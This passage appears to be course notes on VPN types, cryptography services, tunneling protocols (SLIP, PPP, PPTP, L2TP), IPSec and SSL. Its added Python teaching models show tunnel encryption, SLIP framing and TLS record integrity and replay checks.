use a VPN. The NAS requires that user to provide valid credentials to sign in to the VPN.
To authenticate the user's credentials, the NAS uses either its own authentication process
or a separate authentication server running on the network.

Site-to-site VPN
A site-to-site VPN is also called a router-to-router VPN and is the type most used in
corporate operations. Because many companies have offices located both nationally and
internationally, a site-to-site VPN is used to connect the network of the main office to those
of the other offices. This is also known as an intranet-based VPN. The opposite is also
possible: companies use site-to-site VPNs to connect with other companies in the same way, and
this is classified as an extranet-based VPN. In simple terms, site-to-site VPNs build a
virtual bridge that joins the networks at various locations over the Internet while
maintaining secure and private communication between them.

The steps in the above graphic are explained here:

1. A PC in the branch office sends a packet to a server in the headquarters, just as it would
without a VPN.
2. The Cisco Adaptive Security Appliance (ASA) at the branch office, ASA1, encrypts the
original packet, adds a VPN header, and adds a new IP header with public IP addresses.
3. ASA2 at the headquarters receives the packet, authenticates the identity of the sender,
confirms that the packet has not been changed in transit, and then decrypts the original
packet.
4. The server receives the decrypted packet.
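To show what steps 2 and 3 involve, here is an added Python model of one tunnel (example code, not Cisco's implementation and not part of the original material). Both endpoints derive an encryption key and an integrity key from a constructed pre-shared secret. Confidentiality comes from a toy stream cipher built on HMAC-SHA256 (real IPsec uses AES); integrity and peer authentication come from an HMAC tag over the VPN header and ciphertext; anti-replay comes from a sliding window over the authenticated sequence numbers. The outer header is simplified to source, destination and protocol, and the "inner packet" is a constructed byte string standing in for the original IP packet.

```python
import hashlib
import hmac
import socket
import struct

SPI = 0x1000            # security parameter index: identifies the tunnel's key material
TAG_LEN = 16
VPN_HDR = "!II"         # SPI, sequence number (the "VPN header" of step 2)
OUTER_HDR = "!4s4sB"    # simplified outer header: public src, public dst, protocol
PROTO_ESP = 50


class TunnelEndpoint:
    """One end of a toy site-to-site tunnel; both ends are built from the same shared secret.

    Confidentiality: payload XORed with an HMAC-SHA256 keystream (toy cipher, not IPsec's AES).
    Integrity/authentication: HMAC-SHA256 tag over VPN header + ciphertext.
    Anti-replay: sliding window over sequence numbers that have passed authentication.
    """

    def __init__(self, shared_secret: bytes, public_ip: str, peer_ip: str, window: int = 32):
        # separate sub-keys so the cipher and the MAC never share a key
        self.enc_key = hmac.new(shared_secret, b"encryption", hashlib.sha256).digest()
        self.mac_key = hmac.new(shared_secret, b"integrity", hashlib.sha256).digest()
        self.public_ip, self.peer_ip, self.window = public_ip, peer_ip, window
        self.next_seq = 1        # sender state
        self.highest_seq = 0     # receiver state
        self.seen = set()

    def _keystream(self, seq: int, length: int) -> bytes:
        out, block = b"", 0
        while len(out) < length:
            out += hmac.new(self.enc_key, struct.pack("!IQ", seq, block), hashlib.sha256).digest()
            block += 1
        return out[:length]

    def _xor(self, data: bytes, seq: int) -> bytes:
        return bytes(a ^ b for a, b in zip(data, self._keystream(seq, len(data))))

    def encapsulate(self, inner_packet: bytes) -> bytes:
        """Step 2 of the figure: encrypt, add the VPN header, add a new outer header."""
        seq, self.next_seq = self.next_seq, self.next_seq + 1
        vpn_hdr = struct.pack(VPN_HDR, SPI, seq)
        ciphertext = self._xor(inner_packet, seq)
        tag = hmac.new(self.mac_key, vpn_hdr + ciphertext, hashlib.sha256).digest()[:TAG_LEN]
        outer = struct.pack(OUTER_HDR, socket.inet_aton(self.public_ip),
                            socket.inet_aton(self.peer_ip), PROTO_ESP)
        return outer + vpn_hdr + ciphertext + tag

    def receive(self, frame: bytes):
        """Step 3: authenticate, check for replay, then decrypt. Returns (status, data_or_reason)."""
        o = struct.calcsize(OUTER_HDR)
        v = o + struct.calcsize(VPN_HDR)
        spi, seq = struct.unpack(VPN_HDR, frame[o:v])
        ciphertext, tag = frame[v:-TAG_LEN], frame[-TAG_LEN:]
        expected = hmac.new(self.mac_key, frame[o:v] + ciphertext, hashlib.sha256).digest()[:TAG_LEN]
        if spi != SPI or not hmac.compare_digest(tag, expected):
            return "rejected", "authentication failed (forged or modified packet)"
        # The window is updated only after the tag verifies, so forged packets cannot advance it.
        if seq <= self.highest_seq - self.window:
            return "rejected", "sequence number %d outside replay window" % seq
        if seq in self.seen:
            return "rejected", "replayed sequence number %d" % seq
        self.seen.add(seq)
        if seq > self.highest_seq:
            self.highest_seq = seq
            self.seen = {s for s in self.seen if s > self.highest_seq - self.window}
        return "ok", self._xor(ciphertext, seq)


def demo():
    secret = b"pre-shared key agreed out of band (constructed)"
    asa1 = TunnelEndpoint(secret, "203.0.113.10", "198.51.100.20")   # branch office
    asa2 = TunnelEndpoint(secret, "198.51.100.20", "203.0.113.10")   # headquarters
    inner = b"GET /payroll HTTP/1.1\r\nHost: hq-server\r\n\r\n"     # stands in for the original IP packet
    frame = asa1.encapsulate(inner)
    tampered = frame[:-TAG_LEN - 1] + bytes([frame[-TAG_LEN - 1] ^ 0x01]) + frame[-TAG_LEN:]
    results = {
        "first_delivery": asa2.receive(frame),
        "replayed_copy": asa2.receive(frame),          # attacker re-sends the captured frame
        "tampered": asa2.receive(tampered),            # one ciphertext bit flipped in transit
        "plaintext_visible_on_wire": inner in frame,
    }
    results["second_packet"] = asa2.receive(asa1.encapsulate(b"second packet"))
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:26} {value}")
```

Calling demo() shows the four services in action: the first frame is delivered, an exact replay of the same frame is dropped on its sequence number even though its tag is still valid, a one-bit change to the ciphertext fails authentication, and the inner packet is nowhere visible on the wire. The order of checks matters: the replay window is only advanced after the tag verifies, otherwise an attacker could send forged frames with high sequence numbers and make the receiver discard the peer's genuine traffic.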

Above figure shows Cisco Adaptive Security Appliance (ASA) performing VPN functions.
However, several other hardware and software products are available for building VPNs.
Some VPN products offered by Cisco are mentioned here.

 Cisco Router: All Cisco routers that run Cisco IOS software can support IPsec VPNs. The
only requirement is that you should use a Cisco IOS image with appropriate feature set.
Examples of VPN- enabled routers include the Cisco 1800, Cisco 2800, Cisco 1900, and Cisco
2900 series.

 Cisco Adaptive Security Appliance (ASA): The Cisco ASA is a versatile appliance that
combines several security functions including firewall and VPN capabilities in a single piece of
hardware. All ASA models support IPsec VPN provided you meet the licensing requirements
to enable the VPN feature.

 Cisco VPN Clients: Cisco offers both hardware and software VPN clients. Cisco AnyConnect
Secure Mobility Client is a software VPN client that runs on laptops as well as smartphones
and tablets.

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY (III)
The art and science of concealing messages so as to introduce secrecy into information
security is known as cryptography. The word 'cryptography' combines two Greek words, 'kryptós'
meaning hidden and 'graphein' meaning writing.

Security Services of Cryptography

The primary objective of using cryptography is to provide the following four fundamental
information security services:

Confidentiality: Confidentiality is the fundamental security service provided by
cryptography. It keeps information away from unauthorized persons and is sometimes
referred to as privacy or secrecy. Confidentiality can be achieved through numerous
means, from physical security to the use of mathematical algorithms for data encryption.

Data Integrity: This security service deals with identifying any alteration to the data.
The data may be modified by an unauthorized entity intentionally or accidentally. The integrity
service confirms whether the data is still intact since it was last created, transmitted,
or stored by an authorized user. Data integrity cannot prevent the alteration of data, but
it provides a means for detecting whether data has been manipulated in an unauthorized
manner.

Authentication: Authentication provides identification of the originator. It confirms to
the receiver that the data received was sent by an identified and verified sender.
The authentication service has two variants:

 Message authentication identifies the originator of the message without regard to the router or
system that forwarded the message.
 Entity authentication is assurance that data has been received from a specific entity, say a
particular website.

Non-repudiation: This security service ensures that an entity cannot deny
ownership of a previous commitment or action. It is an assurance that the original
creator of the data cannot deny the creation or transmission of the said data to a recipient
or third party. Non-repudiation is a property that is most desirable in situations where there
are chances of a dispute over the exchange of data.

Cryptosystem

A ‘cryptosystem’ is an implementation of cryptographic techniques and their
accompanying infrastructure to provide information security services. A cryptosystem is
also referred to as a cipher system.

Components of a Cryptosystem

The various components of a basic cryptosystem are as follows:

 Plaintext: The data to be protected during transmission.
 Encryption Algorithm: A mathematical process that produces a ciphertext for any
given plaintext and encryption key. The algorithm takes the plaintext and an
encryption key as input and produces the ciphertext.
 Ciphertext: The scrambled version of the plaintext produced by the encryption algorithm
using a specific encryption key. The ciphertext is not guarded: it flows over a public channel
and can be intercepted or read by anyone who has access to the communication
channel.
 Decryption Algorithm: A mathematical process that produces the unique plaintext for
any given ciphertext and decryption key. The algorithm takes a ciphertext and
a decryption key as input and outputs the plaintext. The decryption algorithm essentially
reverses the encryption algorithm and is thus closely related to it.
 Encryption Key: A value known to the sender. The sender inputs the encryption key into the
encryption algorithm along with the plaintext in order to compute the ciphertext.
 Decryption Key: A value known to the receiver. The decryption key is related to the
encryption key, but is not always identical to it. The receiver inputs the decryption key into the
decryption algorithm along with the ciphertext in order to compute the plaintext.
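To tie the components just listed to the four tunnel steps described earlier for ASA1 and ASA2, here is an added Python example that is not part of the original material or of any Cisco implementation: the gateway class, the addresses and the HMAC-SHA256 counter-mode keystream cipher are constructed for illustration and stand in for IPsec's real ESP transform. It assumes a pre-shared encryption key and MAC key on both gateways.

```python
"""Toy site-to-site tunnel built from the cryptosystem components listed above.
Constructed teaching model, stdlib only: the cipher is a keystream derived from
HMAC-SHA256 in counter mode, standing in for IPsec's real ESP transform."""
import hashlib
import hmac
import secrets
import struct

TAG_LEN = 16   # truncated HMAC-SHA256 tag carried with every packet
HDR_LEN = 12   # VPN header: 4-byte sequence number + 8-byte nonce


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Encryption algorithm core: expand (key, nonce) into a pseudo-random keystream."""
    out, counter = bytearray(), 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class VpnGateway:
    """One tunnel endpoint (ASA1 or ASA2). Both share pre-shared keys, so here the
    decryption key equals the encryption key; the text notes that need not hold."""

    def __init__(self, public_ip: str, enc_key: bytes, mac_key: bytes) -> None:
        self.public_ip, self.enc_key, self.mac_key = public_ip, enc_key, mac_key
        self.send_seq = 0       # sequence number written into our VPN header
        self.highest_seen = 0   # highest sequence accepted from the peer (replay check)

    def encapsulate(self, inner_packet: bytes, peer_ip: str) -> bytes:
        """Step 2: encrypt the original packet, add a VPN header, add a public outer header."""
        self.send_seq += 1
        nonce = secrets.token_bytes(8)
        ciphertext = xor_bytes(inner_packet, keystream(self.enc_key, nonce, len(inner_packet)))
        vpn_header = struct.pack(">I", self.send_seq) + nonce
        # Encrypt-then-MAC: the tag authenticates the peer and detects any change in transit.
        # A shared MAC key cannot give non-repudiation (either side could have made the tag);
        # that fourth service needs digital signatures.
        tag = hmac.new(self.mac_key, vpn_header + ciphertext, hashlib.sha256).digest()[:TAG_LEN]
        outer_header = f"{self.public_ip}>{peer_ip}|".encode()   # new header, public addresses
        return outer_header + vpn_header + ciphertext + tag

    def decapsulate(self, packet: bytes) -> bytes:
        """Step 3: authenticate the sender, confirm nothing changed in transit, then decrypt."""
        outer_header, _, body = packet.partition(b"|")
        _src, _, dst = outer_header.decode().partition(">")
        if dst != self.public_ip or len(body) < HDR_LEN + TAG_LEN:
            raise ValueError("not a tunnel packet for this gateway")
        vpn_header, ciphertext, tag = body[:HDR_LEN], body[HDR_LEN:-TAG_LEN], body[-TAG_LEN:]
        expected = hmac.new(self.mac_key, vpn_header + ciphertext, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):
            raise ValueError("authentication/integrity check failed: packet dropped")
        seq = struct.unpack(">I", vpn_header[:4])[0]
        if seq <= self.highest_seen:
            raise ValueError("replayed packet dropped")
        self.highest_seen = seq
        return xor_bytes(ciphertext, keystream(self.enc_key, vpn_header[4:], len(ciphertext)))


def run_demo() -> dict:
    """Walk the four tunnel steps once, then show what the integrity and replay checks catch."""
    enc_key, mac_key = secrets.token_bytes(32), secrets.token_bytes(32)
    asa1 = VpnGateway("203.0.113.1", enc_key, mac_key)    # branch office (constructed address)
    asa2 = VpnGateway("198.51.100.1", enc_key, mac_key)   # headquarters (constructed address)
    # Step 1: the branch PC addresses the HQ server with private addresses, as without a VPN.
    inner = b"10.1.1.10>10.2.2.20|GET /payroll HTTP/1.1"
    wire = asa1.encapsulate(inner, asa2.public_ip)
    results = {"plaintext_hidden": inner not in wire,   # confidentiality on the public path
               "delivered": asa2.decapsulate(wire)}     # step 4: server gets the original packet
    tampered = bytearray(wire)
    tampered[len(wire) - TAG_LEN - 1] ^= 0x01           # one ciphertext byte flipped in transit
    for name, pkt in (("tamper", bytes(tampered)), ("replay", wire)):
        try:
            asa2.decapsulate(pkt)
            results[name] = "accepted"
        except ValueError as err:
            results[name] = str(err)
    return results
```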

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY


(IV)
Different Tunneling Protocols

Serial Line Internet Protocol (SLIP): SLIP was created first to allow isolated hosts to
link via TCP/IP over the telephone network. The SLIP protocol defines a simple
mechanism for framing datagrams for transmission across serial lines. SLIP sends the
datagram across the serial line as a series of bytes, and it uses special characters to mark
when a series of bytes should be grouped together as a datagram. SLIP defines two
special characters for this purpose:

 The SLIP END character is the character that marks the end of a datagram. When the receiving
SLIP encounters the END character, it knows that it has a complete datagram that can be sent
up to IP.

 The SLIP ESC character is used to "escape" the SLIP control characters. If the sending SLIP
encounters a byte value equivalent to either a SLIP END character or a SLIP ESC character in
the datagram it is sending, it converts that character to a sequence of two characters. This
procedure prevents the receiving SLIP from incorrectly interpreting a data byte as the end of the
datagram.

The deficiencies in SLIP fall into two categories:

 The SLIP protocol does not define any link control information that could be used to
dynamically control the characteristics of a connection. Therefore, SLIP systems must assume
certain link characteristics. Because of this limitation, SLIP can only be used when both hosts
know each other's address, and only when IP datagrams are being transmitted.
 SLIP does not compensate for noisy, low-speed telephone lines. The protocol does not
provide error correction or data compression.
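An added Python example, not part of the original material, of the SLIP framing just described, with the END and ESC byte values taken from RFC 1055; the sample datagram is constructed. It also exercises the two deficiencies listed above: a datagram whose END byte is not escaped is split in two, and a byte corrupted on the line is accepted without any error detection.

```python
"""SLIP framing (RFC 1055 byte values) encoder/receiver. Added example; the
sample datagram is constructed and the deficiencies are shown on purpose."""
END, ESC, ESC_END, ESC_ESC = 0xC0, 0xDB, 0xDC, 0xDD   # RFC 1055 special characters


def slip_encode(datagram: bytes) -> bytes:
    """Sending side: escape END/ESC inside the data, then mark the end with END."""
    out = bytearray([END])                 # leading END flushes line noise at the receiver
    for b in datagram:
        if b == END:
            out += bytes([ESC, ESC_END])   # END inside data becomes ESC ESC_END
        elif b == ESC:
            out += bytes([ESC, ESC_ESC])   # ESC inside data becomes ESC ESC_ESC
        else:
            out.append(b)
    out.append(END)
    return bytes(out)


class SlipReceiver:
    """Receiving side: consumes bytes as they arrive from the serial line, in any
    chunking, and hands up a datagram each time an END is seen."""

    def __init__(self) -> None:
        self.buf = bytearray()
        self.escaped = False

    def feed(self, data: bytes) -> list:
        datagrams = []
        for b in data:
            if self.escaped:
                self.escaped = False
                # Any byte other than ESC_END/ESC_ESC after ESC is a protocol violation;
                # RFC 1055's reference code stores the byte anyway, so do the same.
                self.buf.append({ESC_END: END, ESC_ESC: ESC}.get(b, b))
            elif b == END:
                if self.buf:                        # empty frames (leading END) are dropped
                    datagrams.append(bytes(self.buf))
                    self.buf = bytearray()
            elif b == ESC:
                self.escaped = True
            else:
                self.buf.append(b)
        return datagrams


# Constructed datagram: a few header-like bytes, then data that happens to contain
# both special byte values, followed by ordinary payload.
SAMPLE = bytes([0x45, 0x00, 0x00, 0x14]) + bytes([END, ESC]) + b"data"


def demonstrate() -> dict:
    results = {}
    frame = slip_encode(SAMPLE)
    # Correct framing round-trips even when the bytes arrive in arbitrary chunks.
    rx = SlipReceiver()
    results["roundtrip"] = rx.feed(frame[:3]) + rx.feed(frame[3:])
    # Why escaping matters: an unescaped END inside the data makes the receiver
    # split the datagram, so two wrong datagrams are handed up to IP.
    results["unescaped"] = SlipReceiver().feed(SAMPLE + bytes([END]))
    # Deficiency: no error detection. A single-bit flip in the payload on a noisy
    # line yields a different datagram that the receiver accepts as valid.
    noisy = bytearray(frame)
    noisy[9] ^= 0x01                 # 'd' (0x64) becomes 'e' (0x65)
    results["corrupted"] = SlipReceiver().feed(bytes(noisy))
    return results
```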

Point-to-Point Protocol (PPP): PPP was devised by the IETF (Internet Engineering Task
Force) as a data link protocol for point-to-point lines that solves the problems
present in SLIP. PPP is the most commonly used data link protocol. It is used to connect
a home PC to the server of an ISP via a modem. This protocol offers several facilities that
were not present in SLIP. Some of these facilities are:

1. PPP defines the format of the frame to be exchanged between the devices.

2. It defines a link control protocol (LCP) for -

(a) Establishing the link between two devices.

(b) Maintaining this established link.

(c) Configuring this link.

(d) Terminating this link after the transfer.

3. It defines how network layer data are encapsulated in the data link frame.

4. PPP provides error detection.

5. Unlike SLIP, which supports only IP, PPP supports multiple protocols.

6. PPP allows the IP address to be assigned at connection time, i.e. dynamically.
Thus, a temporary IP address can be assigned to each host.

7. PPP provides multiple network layer services supporting a variety of network layer protocols.
For this, PPP uses a protocol called NCP (Network Control Protocol).

8. It also defines how two devices can authenticate each other.

PPP uses several other protocols to establish link, authenticate users and to carry the
network layer data. The various protocols used are:

1. Link Control Protocol (LCP) - It is responsible for establishing, maintaining, configuring and
terminating the link. It also provides a negotiation mechanism to set options between the two
endpoints.

2. Authentication Protocol (AP) - Authentication protocols help to validate the identity of a user
who needs to access the resources. There are two authentication protocols:

 Password Authentication Protocol (PAP)
 Challenge Handshake Authentication Protocol (CHAP)

3. Network Control Protocol (NCP) - After establishing the link and authenticating the user, PPP
connects to the network layer. This connection is established by NCP. NCP is therefore a set of
control protocols that allow the encapsulation of the data coming from the network layer. After one of
the NCP protocols has done the network layer configuration, the users can exchange data from the
network layer. PPP can carry network layer data packets from protocols defined by the Internet,
DECnet, AppleTalk, Novell, OSI, Xerox and so on. None of the NCP packets carries network
layer data; they just configure the link at the network layer for the incoming data.

Point-to-Point Protocol over Ethernet (PPPoE): PPPoE is a network configuration
used for establishing a PPP connection over an Ethernet protocol. It is commonly used
for creating DSL Internet connections. Since DSL modems typically connect to computers
via an Ethernet connection, a standard dial-up PPP connection cannot be used.
Therefore, PPP over Ethernet allows computers to connect to an Internet service provider
(ISP) via a DSL modem. In order to create a PPPoE connection, you will need to enter
the service name provided by the ISP as well as a username and password. This provides
a simple way for the ISP to uniquely identify your system and establish your Internet
connection. PPPoE can be contrasted with DHCP, which dynamically assigns unique IP
addresses to connected systems and is typically used by cable Internet service providers.

The biggest advantage of a PPPoE configuration is that it is easy to set up. It also
supports multiple computers on a local area network (LAN). The downside of PPPoE is
that it requires additional overhead, or extra data, to be sent over the Internet connection.

Point-to-Point Tunneling Protocol (PPTP): PPTP (Point-to-Point Tunneling Protocol)
is a network protocol used in the implementation of Virtual Private Networks (VPN). PPTP
uses a client-server design that operates at Layer 2 of the OSI model. PPTP VPN clients
are included by default in Microsoft Windows and available for both Linux and Mac OS X.
PPTP is most commonly used for VPN remote access over the Internet. In this usage,
VPN tunnels are created via the following two-step process:

 The user launches a PPTP client that connects to their Internet provider.
 PPTP creates a TCP control connection between the VPN client and VPN server. The protocol
uses TCP port 1723 for these connections and Generic Routing Encapsulation (GRE) to finally
establish the tunnel.

As a tunneling protocol, PPTP encapsulates network protocol datagrams within an IP
envelope. After the packet is encapsulated, any router or machine that encounters it from
that point on will treat it as an IP packet. The benefit of IP encapsulation is that it allows
many different protocols to be routed across an IP-only medium, such as the Internet.

PPTP also supports VPN connectivity across a local network. Once the VPN tunnel is
established, PPTP supports two types of information flow:

 Control messages for managing and eventually tearing down the VPN connection.
Control messages pass directly between VPN client and server.
 Data packets that pass through the tunnel, to or from the VPN client.

PPTP offers the following advantages:


 Lower transmission costs: No additional service used, other than the Internet.
 Lower hardware costs: Allows ISDN cards and modems to be separated from RAS
servers, which results in fewer devices to purchase and manage.
 Low administrative overhead: Administrators only manage the remote access server
(RAS) and user accounts, rather than managing different hardware configurations.
 Enhanced security: PPTP connection is encrypted and secured over the Internet and
works with other networking protocols, like IP, Internetwork Packet Exchange (IPX) and
NetBIOS Extended User Interface (NetBEUI).

Layer-2 Tunneling Protocol (L2TP): This protocol was designed by the IETF. L2TP utilizes two types of
messages - control messages and data messages. Control messages are used in the establishment,
maintenance and clearing of tunnels and calls. Data messages are used to encapsulate PPP frames being
carried over the tunnel. Control messages utilize a reliable Control Channel within L2TP to guarantee
delivery. Data messages are not retransmitted when packet loss occurs.

PPP Frames are passed over an unreliable Data Channel encapsulated first by an L2TP header and
then a Packet Transport such as UDP, Frame Relay, ATM, etc. Control messages are sent over a
reliable L2TP Control Channel, which transmits packets in-band over the same Packet Transport.

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY


(V)

IP Security Protocol

Internet Protocol security (IPSec) is a framework of open standards for protecting
communications over Internet Protocol (IP) networks with cryptographic security services.
IPSec supports network-level peer authentication, data origin authentication, data
integrity, data confidentiality (encryption), and replay protection.

IPSec provides the capability to secure communications across a LAN, across private
and public wide area networks (WANs), and across the Internet.
• Secure branch office connectivity over the Internet: A company can build a secure virtual
private network over the Internet or over a public WAN. This enables a business to rely heavily
on the Internet and reduce its need for private networks, saving costs and network management
overhead.
• Secure remote access over the Internet: An end user whose system is equipped with IP
security protocols can make a local call to an Internet service provider (ISP) and gain secure
access to a company network. This reduces the cost of toll charges for travelling employees and
telecommuters.
• Establishing extranet and intranet connectivity with partners: IPSec can be used to secure
communication with other organizations, ensuring authentication and confidentiality and
providing a key exchange mechanism.
• Enhancing electronic commerce security: Even though some Web and electronic commerce
applications have built-in security protocols, the use of IPSec enhances that security.

The following figure shows a typical scenario of IPSec usage. An organization maintains LANs at
dispersed locations. Non-secure IP traffic is conducted on each LAN.

The benefits of IPSec are listed below:


• IPSec in a firewall/router provides strong security to all traffic crossing the perimeter.
• IPSec in a firewall is resistant to bypass.
• IPSec is below the transport layer (TCP, UDP), hence transparent to applications.
• IPSec can be transparent to end users.
• IPSec can provide security for individual users if needed (useful for offsite workers and
setting up a secure virtual subnetwork for sensitive applications).

IP Security Architecture

The IPSec architecture is described by the following groups of documents:

• Architecture: Covers the general concepts, security requirements, definitions, and
mechanisms defining IPSec technology.

• Encapsulating Security Payload (ESP): Covers the packet format and general issues related
to the use of ESP for packet encryption and, optionally, authentication.

• Authentication Header (AH): Covers the packet format and general issues related to the use
of AH for packet authentication.

• Encryption Algorithm: A set of documents that describe how various encryption algorithms
are used for ESP.

• Authentication Algorithm: A set of documents that describe how various authentication
algorithms are used for AH and for the authentication option of ESP.

• Key Management: Documents that describe key management schemes.

• Domain of Interpretation (DOI): Contains values needed for the other documents to relate
to each other. These include identifiers for approved encryption and authentication
algorithms, as well as operational parameters such as key lifetime.

In 1995, Netscape developed SSLv2 and used it in Netscape Navigator 1.1. SSL
version 1 was never published or used. Later, Microsoft improved upon SSLv2 and
introduced another similar protocol named Private Communications Technology (PCT).
Netscape substantially improved SSLv2 on various security issues and deployed SSLv3
in 1999. The Internet Engineering Task Force (IETF) subsequently introduced the similar
TLS (Transport Layer Security) protocol as an open standard. The TLS protocol is not
interoperable with SSLv3. The salient features of the SSL protocol are as follows −

 SSL provides network connection security through −
o Confidentiality − Information is exchanged in an encrypted form.
o Authentication − Communicating entities identify each other with digital
certificates. Web-server authentication is mandatory whereas client authentication
is optional.
o Reliability − Maintains message integrity checks.
 SSL is available for all TCP applications.
 Supported by almost all web browsers.
 Provides ease in doing business with new online entities.
 Developed primarily for Web e-commerce.

Secure Socket Layer (SSL) Protocol

Architecture of SSL

SSL is specific to TCP and does not work with UDP. SSL provides an Application
Programming Interface (API) to applications. SSL itself is not a single-layer protocol as
depicted in the image; in fact it is composed of two sub-layers.

 The lower sub-layer comprises one component of the SSL protocol, called the SSL Record
Protocol. This component provides integrity and confidentiality services.
 The upper sub-layer comprises three SSL-related protocol components and an application
protocol. The application component provides the information transfer service between
client/server interactions. Technically, it can operate on top of the SSL layer as well. The three
SSL-related protocol components are −
o SSL Handshake Protocol
o Change Cipher Spec Protocol
o Alert Protocol
 These three protocols manage all SSL message exchanges.

Record Protocol

o The record layer formats the upper layer protocol messages.
o It fragments the data into manageable blocks (max length 16 KB) and optionally compresses
the data.
o It encrypts the data.
o It provides a header for each message and a hash (Message Authentication Code (MAC)) at
the end.
o It hands over the formatted blocks to the TCP layer for transmission.

SSL Handshake Protocol

o It is the most complex part of SSL. It is invoked before any application data is transmitted. It
creates SSL sessions between the client and the server.
o Establishment of a session involves server authentication, key and algorithm negotiation,
establishing keys, and client authentication (optional).
o A session is identified by a unique set of cryptographic security parameters.
o Multiple secure TCP connections between a client and a server can share the same session.
o The handshake protocol proceeds through four phases.

Change CipherSpec Protocol

o The simplest part of the SSL protocol. It comprises a single message exchanged between the
two communicating entities, the client and the server.
o As each entity sends the ‘Change CipherSpec’ message, it changes its side of the
connection into the secure state as agreed upon.
o The pending cipher parameter state is copied into the current state.
o Exchange of this message indicates that all future data exchanges are encrypted and
integrity-protected.

SSL Alert Protocol

o This protocol is used to report errors – such as unexpected message, bad record MAC,
security parameters negotiation failed, etc.
o It is also used for other purposes – such as notify closure of the TCP connection, notify
receipt of bad or unknown certificate, etc.
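An added Python example, not from the original material, modelling the Record Protocol and Alert Protocol sections above: fragmentation into records of at most 16 KB, the five-byte record header (content type, version, length), a per-record MAC bound to a sequence number, and the bad_record_mac and record_overflow alerts a receiver raises. Compression and the encryption step are left out, and the constants assumed are the TLS 1.2 values.

```python
"""Simplified SSL/TLS record layer and alert protocol. Added teaching model:
fragmentation, 5-byte header, sequence-numbered MAC and two alerts; compression
and encryption are omitted. Constants are the TLS 1.2 values."""
import hashlib
import hmac
import struct

MAX_FRAGMENT = 2 ** 14                    # 16 KB upper bound on one record's data
MAC_LEN = 32                              # HMAC-SHA256 output length
APPLICATION_DATA, ALERT = 23, 21          # record content types
TLS12 = 0x0303                            # version field
FATAL = 2                                 # alert level
BAD_RECORD_MAC, RECORD_OVERFLOW = 20, 22  # alert descriptions

HEADER = struct.Struct(">BHH")            # content type, version, length


def record_mac(key: bytes, seq: int, ctype: int, fragment: bytes) -> bytes:
    """The MAC input covers the sequence number and header fields, not only the fragment,
    so a replayed, reordered or retyped record fails even when its bytes are intact."""
    data = struct.pack(">QBHH", seq, ctype, TLS12, len(fragment)) + fragment
    return hmac.new(key, data, hashlib.sha256).digest()


class RecordWriter:
    def __init__(self, mac_key: bytes) -> None:
        self.mac_key, self.seq = mac_key, 0

    def write(self, data: bytes, ctype: int = APPLICATION_DATA) -> bytes:
        """Fragment data into records: header + fragment + MAC, one sequence number each."""
        chunks = [data[i:i + MAX_FRAGMENT] for i in range(0, len(data), MAX_FRAGMENT)] or [b""]
        records = []
        for frag in chunks:
            body = frag + record_mac(self.mac_key, self.seq, ctype, frag)
            records.append(HEADER.pack(ctype, TLS12, len(body)) + body)
            self.seq += 1
        return b"".join(records)


class RecordReader:
    def __init__(self, mac_key: bytes) -> None:
        self.mac_key, self.seq, self.buf = mac_key, 0, b""

    def read(self, stream: bytes) -> tuple:
        """Parse the complete records received so far. Returns (fragments, alert), where
        alert is None or (ALERT, FATAL, description) for the first record that fails."""
        self.buf += stream
        fragments = []
        while len(self.buf) >= HEADER.size:
            ctype, _version, length = HEADER.unpack(self.buf[:HEADER.size])
            if length > MAX_FRAGMENT + MAC_LEN:
                return fragments, (ALERT, FATAL, RECORD_OVERFLOW)
            if len(self.buf) < HEADER.size + length:
                break                                  # wait for the rest of this record
            body = self.buf[HEADER.size:HEADER.size + length]
            self.buf = self.buf[HEADER.size + length:]
            frag, tag = body[:-MAC_LEN], body[-MAC_LEN:]
            if len(body) < MAC_LEN or not hmac.compare_digest(
                    tag, record_mac(self.mac_key, self.seq, ctype, frag)):
                return fragments, (ALERT, FATAL, BAD_RECORD_MAC)
            self.seq += 1
            fragments.append((ctype, frag))
        return fragments, None


def demonstrate() -> dict:
    key = b"constructed-mac-key-for-demo"
    data = bytes(range(256)) * 160                    # 40,960 bytes of application data
    stream = RecordWriter(key).write(data)
    ok, alert = RecordReader(key).read(stream)
    results = {"records": len(ok), "clean": alert,
               "reassembled": b"".join(f for _, f in ok) == data}
    # A byte changed in flight: the MAC fails and the reader answers bad_record_mac.
    damaged = bytearray(stream)
    damaged[HEADER.size + 100] ^= 0x01
    results["tampered"] = RecordReader(key).read(bytes(damaged))[1]
    # The first record delivered twice: bytes intact, but the sequence number no
    # longer matches, so the replay is also rejected with bad_record_mac.
    first = stream[:HEADER.size + MAX_FRAGMENT + MAC_LEN]
    results["replayed"] = RecordReader(key).read(first + first)[1]
    # A header claiming more than the record layer allows: record_overflow.
    results["oversized"] = RecordReader(key).read(HEADER.pack(APPLICATION_DATA, TLS12, 0xFFFF))[1]
    return results
```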

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY


(VI)
Digital Signature
A ‘Digital Signature’ is a mathematical technique used to validate the authenticity
and integrity of a message, software or digital document. Basically, a digital
certificate, also known as a public key certificate, is used to cryptographically link
ownership of a public key with the entity that owns it. Digital certificates are for
sharing public keys to be used for encryption and authentication. Digital certificates
include the public key being certified, identifying information about the entity that
owns the public key, metadata relating to the digital certificate and a digital signature
of the public key created by the issuer of the certificate.
Public key cryptography depends on key pairs: a private key held by the
owner and used for signing and decrypting, and a public key that can be used for
encrypting data sent to the public key owner or for authenticating the certificate
holder's signed data. The digital certificate enables entities to share their public key
in a way that can be authenticated.
Digital certificates are used in public key cryptography functions; they are most
commonly used for initializing secure SSL connections between web browsers and
web servers. Digital certificates are also used for sharing keys to be used for public
key encryption and authentication of digital signatures.
All major web browsers and web servers use digital certificates to provide assurance
that unauthorized actors have not modified published content, and to share keys for
encrypting and decrypting web content. Digital certificates are also used in
other contexts, both online and offline, for providing cryptographic assurance and
privacy of data.
Digital Certificate

The digital certificate is one of the foundations of a public key infrastructure (PKI). A
